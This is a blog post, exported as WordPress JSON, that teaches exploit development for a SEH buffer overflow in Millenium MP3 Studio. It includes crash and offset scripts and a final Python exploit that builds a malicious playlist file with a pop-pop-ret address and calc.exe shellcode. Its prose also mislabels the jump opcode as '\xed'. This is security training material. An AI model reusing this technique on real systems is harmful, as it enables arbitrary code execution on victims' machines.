{"id":32,"date":"2021-02-10T10:02:43","date_gmt":"2021-02-10T10:02:43","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=32"},"modified":"2021-02-10T10:02:55","modified_gmt":"2021-02-10T10:02:55","slug":"exploit-development-millenium-mp3-studio-seh-windbg","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/exploit-development-millenium-mp3-studio-seh-windbg\/","title":{"rendered":"Exploit Development: Millenium MP3 Studio – SEH (WinDBG)"},"content":{"rendered":"\n

Crash<\/h2>\n\n\n\n
#!\/usr\/bin\/python
file = “kalisa.mpf”
buffer =  “http:\/\/” +  “A” * 5000
f = open(file,’w’)f.write(buffer)f.close()<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n

Offset<\/h2>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
#!\/usr\/bin\/python
file = “kalisa.mpf”
buffer =  “http:\/\/” +  “A”*4105+”B”* 4+”C”*1000
f = open(file,’w’)f.write(buffer)f.close()<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

pop -pop -ret<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

Stack<\/h2>\n\n\n\n
nseh (4 bytes)<\/td>seh (4 bytes)<\/td>other (4 bytes)<\/td>other (4 bytes)<\/td><\/tr>
other (4 bytes)<\/td>other(4 bytes)<\/td>hole (4 bytes)<\/td>other (4 bytes)<\/td><\/tr>
shellcode starts here<\/td><\/td><\/td><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

So “jmp 30 bytes” will be for 2 bytes in nseh. To start the shellcode as desired we will jump the following red area which is 30 bytes<\/p>\n\n\n\n

nseh \\xed\\x1e\\x90\\x90 (2+2 bytes)<\/td>seh (4 bytes)<\/td>other (4 bytes)<\/td>other (4 bytes)<\/td><\/tr>
other (4 bytes)<\/td>other(4 bytes)<\/td>hole (4 bytes)<\/td>other (4 bytes)<\/td><\/tr>
shellcode starts here<\/td><\/td><\/td><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

\\xed : jmp\\x1e : 30
You can see the hole below:<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

How our specific shellcode have place including the hole<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

Final Exploit<\/h2>\n\n\n\n
#!\/usr\/bin\/python
file = “kalisa.mpf”
#buffer = “A”*4112+”B”*4+”C”*4
# nseh (4) + seh (4) +other (8) = 16# other (8) + hole (4) + other (4) = 16# start of shellcode = 16 bytes
# 2 null bytes from nseh (2) + 4 seh (4)  + other (8) + 16 next row (16) = 30 bytes
# \\xeb\\x1e means jmp 30 bytes which will be in nseh for 2 bytes
offset = “http:\/\/” + “A” * 4105nextSEH = “\\xeb\\x1e\\x90\\x90”    # jmp 30 bytesSEH = “\\xAE\\x03\\x01\\x10” # pop-pop-ret from xaudio.dllnops = “\\x90” * 24 # 24 bytes nop sled
# msfpayload windows\/exec CMD=calc.exe EXITFUNC=seh R | msfencode -b ‘\\x00\\x0a\\x0d’ -t perl# [*] x86\/shikata_ga_nai succeeded with size 227 (iteration=1)
calc = (“\\xbb\\x34\\x46\\x73\\x3a\\xda\\xd2\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9″ +”\\xb1\\x33\\x31\\x5a\\x12\\x83\\xea\\xfc\\x03\\x6e\\x48\\x91\\xcf\\x72″ +”\\xbc\\xdc\\x30\\x8a\\x3d\\xbf\\xb9\\x6f\\x0c\\xed\\xde\\xe4\\x3d\\x21″ +”\\x94\\xa8\\xcd\\xca\\xf8\\x58\\x45\\xbe\\xd4\\x6f\\xee\\x75\\x03\\x5e” +”\\xef\\xbb\\x8b\\x0c\\x33\\xdd\\x77\\x4e\\x60\\x3d\\x49\\x81\\x75\\x3c” +”\\x8e\\xff\\x76\\x6c\\x47\\x74\\x24\\x81\\xec\\xc8\\xf5\\xa0\\x22\\x47″ +”\\x45\\xdb\\x47\\x97\\x32\\x51\\x49\\xc7\\xeb\\xee\\x01\\xff\\x80\\xa9″ +”\\xb1\\xfe\\x45\\xaa\\x8e\\x49\\xe1\\x19\\x64\\x48\\x23\\x50\\x85\\x7b” +”\\x0b\\x3f\\xb8\\xb4\\x86\\x41\\xfc\\x72\\x79\\x34\\xf6\\x81\\x04\\x4f” +”\\xcd\\xf8\\xd2\\xda\\xd0\\x5a\\x90\\x7d\\x31\\x5b\\x75\\x1b\\xb2\\x57″ +”\\x32\\x6f\\x9c\\x7b\\xc5\\xbc\\x96\\x87\\x4e\\x43\\x79\\x0e\\x14\\x60″ +”\\x5d\\x4b\\xce\\x09\\xc4\\x31\\xa1\\x36\\x16\\x9d\\x1e\\x93\\x5c\\x0f” +”\\x4a\\xa5\\x3e\\x45\\x8d\\x27\\x45\\x20\\x8d\\x37\\x46\\x02\\xe6\\x06″ +”\\xcd\\xcd\\x71\\x97\\x04\\xaa\\x80\\x66\\x95\\x26\\x14\\xd1\\x4c\\x0b” +”\\x78\\xe2\\xba\\x4f\\x85\\x61\\x4f\\x2f\\x72\\x79\\x3a\\x2a\\x3e\\x3d” +”\\xd6\\x46\\x2f\\xa8\\xd8\\xf5\\x50\\xf9\\xba\\x98\\xc2\\x61\\x13\\x3f” +”\\x63\\x03\\x6b”)
#shellcode = “\\xcc\\xcc\\xcc\\xcc”
buffer = offset + nextSEH + SEH + nops + calc
f = open(file,’w’)f.write(buffer)f.close()<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\"\"\/<\/figure>\n","protected":false},"excerpt":{"rendered":"

Crash #!\/usr\/bin\/pythonfile = “kalisa.mpf”buffer =  “http:\/\/” +  “A” * 5000f = open(file,’w’)f.write(buffer)f.close() Offset #!\/usr\/bin\/pythonfile = “kalisa.mpf”buffer =  “http:\/\/” +  “A”*4105+”B”* 4+”C”*1000f = open(file,’w’)f.write(buffer)f.close() pop -pop -ret Stack nseh (4 bytes) seh (4 bytes) other (4 bytes) other (4 bytes) other (4 bytes) other(4 bytes) hole (4 bytes) other (4 bytes) shellcode starts here So “jmp… Continue reading Exploit Development: Millenium MP3 Studio – SEH (WinDBG)<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[18],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/32"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=32"}],"version-history":[{"count":1,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/32\/revisions"}],"predecessor-version":[{"id":33,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/32\/revisions\/33"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=32"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=32"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=32"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}